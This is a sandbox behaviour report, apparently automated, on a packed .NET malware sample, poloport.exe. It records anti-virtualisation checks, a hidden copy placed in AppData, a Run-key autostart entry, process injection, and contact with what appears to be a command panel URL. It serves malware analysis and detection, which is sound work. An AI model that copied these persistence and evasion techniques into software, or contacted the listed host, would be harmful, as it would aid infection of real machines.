_^aG
P`BpK
0vcU
GeneratedCodeAttribute
(,5{P#
`~Oup
Dl5z
U:q|
!KGq7
\Wh!
W1AT
wVqt
`|>1
LFD/
W'G)
"dA^
}(s6
1X T
Z?9n
C OX
poloport.exe
\z6(
_QZ'
p%\/-
]PTA_
JW1g
L>dd
j{{}
Olr`|
>Ow^
'{=K0
(s{
F[ `
t}/q]
ExNl
x+%3`~s
!\q
0cmrrp'
r_7Gx
{ {l
l[1q
6[3?
B6CKm
p(\o
:7F[
YC*|o
(l
7j>B
di]xf
2Law
NewLateBinding
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-02-08 22:29:19 | 2018-02-08 22:32:13 | 174 |
14 Behaviors detected by system signatures
Collects information to fingerprint the system
Severity: High
Confidence: High
Checks the CPU name from registry, possibly for anti-virtualization
Severity: High
Confidence: Very High
Retrieves Windows ProductID, probably to fingerprint the sandbox
Severity: High
Confidence: Very High
Creates a hidden or system file
Severity: High
Confidence: Medium
- file: C:\Users\Seven01\AppData\Roaming\jit\jit.exe
Installs itself for autorun at Windows startup
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit
- data: C:\Users\Seven01\AppData\Roaming\jit\jit.exe
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: poloport.exe(2476) -> None(2692)
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.99, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0003d400, virtual_size: 0x0003d364
- section: name: .rsrc, entropy: 7.92, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00030800, virtual_size: 0x000306a4
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://checkip.dyndns.org/
- url: http://yt.wozyzy.com/WebPanel/api.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://checkip.dyndns.org/
- suspicious_request: http://yt.wozyzy.com/WebPanel/api.php
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: WmiPrvSE.exe tried to sleep 301 seconds, actually delayed analysis time by 0 seconds
Creates RWX memory
Severity: Medium
Confidence: Medium
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-02-08 22:29:19 | 2018-02-08 22:32:13 | 174 |
9 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\poloport.exe.config C:\Users\Seven01\AppData\Local\Temp\poloport.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\poloport\* C:\Users\Seven01\AppData\Local\Temp\poloport.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\poloport.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\poloport.resources\poloport.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\poloport.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\poloport.resources\poloport.resources.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Users\Seven01\AppData\Local\Temp\it\poloport.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\poloport.resources\poloport.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\poloport.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\poloport.resources\poloport.resources.exe C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Users\Seven01\AppData\Local\Temp\poloport.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Users\Seven01\AppData\Roaming\jit\ C:\Users\Seven01\AppData\Roaming\jit C:\Users\Seven01\AppData\Roaming C:\Users\Seven01\AppData\Roaming\jit\jit.exe C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\psapi.dll C:\Windows\sysnative\wbem\WmiPrvSE.exe C:\Windows\inf\hdaudio.inf C:\Windows\sysnative\DriverStore\it-IT\hdaudio.inf_loc C:\Windows\inf\hdaudio.PNF \??\PIPE\samr C:\Windows\sysnative\wbem\repository C:\Windows\sysnative\wbem\Logs C:\Windows\sysnative\wbem\AutoRecover C:\Windows\sysnative\wbem\MOF C:\Windows\sysnative\wbem\repository\INDEX.BTR C:\Windows\sysnative\wbem\repository\WRITABLE.TST C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\WMIDataDevice C:\Windows\sysnative\Branding\basebrd\basebrd.dll C:\Windows\Branding\Basebrd\basebrd.dll C: C:\Windows\sysnative\tzres.dll \??\PIPE\wkssvc C:\DosDevices\pipe\ \??\PIPE\srvsvc C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Users\Seven01\AppData\Local\Temp\D6v.exe.config C:\Users\Seven01\AppData\Local\Temp\D6v.exe C:\Windows\assembly\NativeImages_v4.0.30319_32\ConsoleApp1\* C:\Users\Seven01\AppData\Local\Temp\D6v.INI C:\Windows\Microsoft.Net\assembly\GAC_32\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Serialization.Formatters.Soap.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\poloport.exe.config C:\Users\Seven01\AppData\Local\Temp\poloport.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\sysnative\wbem\WmiPrvSE.exe C:\Windows\inf\hdaudio.PNF \??\PIPE\samr C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\INDEX.BTR \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\WMIDataDevice C:\Windows\Branding\Basebrd\basebrd.dll C: C:\Windows\sysnative\tzres.dll \??\PIPE\wkssvc \??\PIPE\srvsvc C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Users\Seven01\AppData\Local\Temp\D6v.exe.config C:\Users\Seven01\AppData\Local\Temp\D6v.exe C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\c7dd43f20550205c8b37ec91b5f2bec7\System.Windows.Forms.ni.dll
Write Files
C:\Users\Seven01\AppData\Roaming\jit\jit.exe \??\PIPE\samr C:\Windows\sysnative\wbem\repository\WRITABLE.TST C:\Windows\sysnative\wbem\repository\MAPPING1.MAP C:\Windows\sysnative\wbem\repository\MAPPING2.MAP C:\Windows\sysnative\wbem\repository\MAPPING3.MAP C:\Windows\sysnative\wbem\repository\OBJECTS.DATA C:\Windows\sysnative\wbem\repository\INDEX.BTR \??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER \??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM \??\WMIDataDevice \??\PIPE\wkssvc \??\PIPE\srvsvc
Delete Files
Nothing to display
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\poloport.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|poloport.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|poloport.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|poloport.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\jit HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\poloport.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE 